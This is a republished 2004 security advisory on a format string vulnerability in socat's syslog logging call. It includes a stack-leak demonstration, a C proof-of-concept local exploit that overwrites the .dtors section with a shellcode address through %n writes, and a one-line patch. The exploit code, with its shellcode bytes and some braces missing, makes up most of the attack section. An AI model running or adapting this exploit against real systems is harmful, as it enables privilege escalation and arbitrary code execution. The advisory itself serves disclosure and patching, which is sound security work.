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07 - socat <= Format String Vulnerability

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Published in 
 · 19 Dec 2022

No System Group - Advisory #07 - 18/10/04


Socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (terminal or modem, etc.), socket (Unix, IP4, IP6 - raw, UDP, TCP), a client for SOCKS4, proxy CONNECT, or SSL, etc. It provides forking, logging, and dumping, different modes for interprocess communication, and many more options. It can be used, for example, as a TCP relay (one-shot or daemon), as a daemon-based socksifier, as a shell interface to Unix sockets, as an IP6 relay, for redirecting TCP-oriented programs to a serial line, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts with network connections.

More informations at:


Socat is affected by a format string bug in the void _msg() function to 220 lines of error.c code:

--- error.c --- 
215:static void _msg(int level, const char *buff, const char *syslp) {
216: if (diagopts.logstderr) {
217: fputs(buff, stderr); fflush(stderr);
218: }
219: if (diagopts.syslog) {
220: syslog(syslevel[level], syslp);
221: }
222: if (diagopts.logfile) {
223: fputs(buff, diagopts.logfile); fflush(diagopts.logfile);
224: }
--- error.c ---

We can show some parts of the stack memory by using a format string like this:

coki@servidor:~/audit$ socat -lyAAAA%30\$p 
2004/10/18 13:13:07 socat[25191] E unknown syslog facility "AAAA%30$p"
coki@servidor:~/audit$ tail -n 1 /var/log/syslog
Oct 18 13:13:07 servidor socat[25191]: E unknown syslog facility "AAAA0x41414141"


------------------ socat_exp.c ------------------ 
/* socat_exp.c

Socat Format String Vulnerability

socat <= local exploit (Proof of Concept)

Tested in Slackware 9.0 / 9.1 / 10.0

by CoKi <>
No System Group -

#include <stdio.h>
#include <string.h>

#define PATH "/usr/local/bin/socat"
#define OBJDUMP "/usr/bin/objdump"
#define GREP "/usr/bin/grep"

unsigned char shellcode[]= /* aleph1 shellcode.45b */

int check(unsigned long addr);

int main(int argc, char *argv[]) {

int i, dtorsaddr;
unsigned int bal1, bal2, bal3, bal4;
char temp[512];
char buffer[1024];
int cn1, cn2, cn3, cn4;
FILE *f;
char *env[3] = {shellcode, NULL};
int shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);

sprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);
f = popen(temp, "r");
if(fscanf(f, " %08x", &dtorsaddr) != 1) {
printf("Cannot find .dtors address\n");
dtorsaddr = dtorsaddr + 4;

printf("\n socat <= local exploit (Proof of Concept)\n");
printf(" by CoKi <>\n\n");
printf(" shellcode address = %.8p\n", shaddr);
printf(" .dtors address = %.8p\n\n", dtorsaddr);

bzero(temp, sizeof(temp));
bzero(buffer, sizeof(buffer));

strcat(buffer, "-ly");

for(i = 0; i < 4; i++) {
bzero(temp, sizeof(temp));
sprintf(temp, "%s", &dtorsaddr);
strncat(buffer, temp, 4);

bal1 = (shaddr & 0xff000000) >> 24;
bal2 = (shaddr & 0x00ff0000) >> 16;
bal3 = (shaddr & 0x0000ff00) >> 8;
bal4 = (shaddr & 0x000000ff);

cn1 = bal4 - 27 - 16;
cn1 = check(cn1);
cn2 = bal3 - bal4;
cn2 = check(cn2);
cn3 = bal2 - bal3;
cn3 = check(cn3);
cn4 = bal1 - bal2;
cn4 = check(cn4);

sprintf(temp, "%%%du%%30\$n%%%du%%31\$n%%%du%%32\$n%%%du%%33\$n", cn1, cn2, cn3, cn4);

strcat(buffer, temp);

execle(PATH, "socat", buffer, NULL, env);

int check(unsigned long addr) {
char tmp[128];
snprintf(tmp, sizeof(tmp), "%d", addr);
if(atoi(tmp) < 1)
addr = addr + 256;

return addr;

------------------ socat_exp.c ------------------

coki@servidor:~$ make socat_exp
coki@servidor:~$ ./socat_exp

socat <= local exploit (Proof of Concept)
by CoKi <>

shellcode address = 0xbfffffb9
.dtors address = 0x080740c4

2004/10/19 09:49:46 socat[26197] E unknown syslog facility

This exploit does not give a root shell :(


Change the void _msg() function of error.c code:

--- error.c --- 
215:static void _msg(int level, const char *buff, const char *syslp) {
216: if (diagopts.logstderr) {
217: fputs(buff, stderr); fflush(stderr);
218: }
219: if (diagopts.syslog) {
220: syslog(syslevel[level], "%s", syslp); // <--- here
221: }
222: if (diagopts.logfile) {
223: fputs(buff, diagopts.logfile); fflush(diagopts.logfile);
224: }
--- error.c ---



Discovered by CoKi <>

No System Group -

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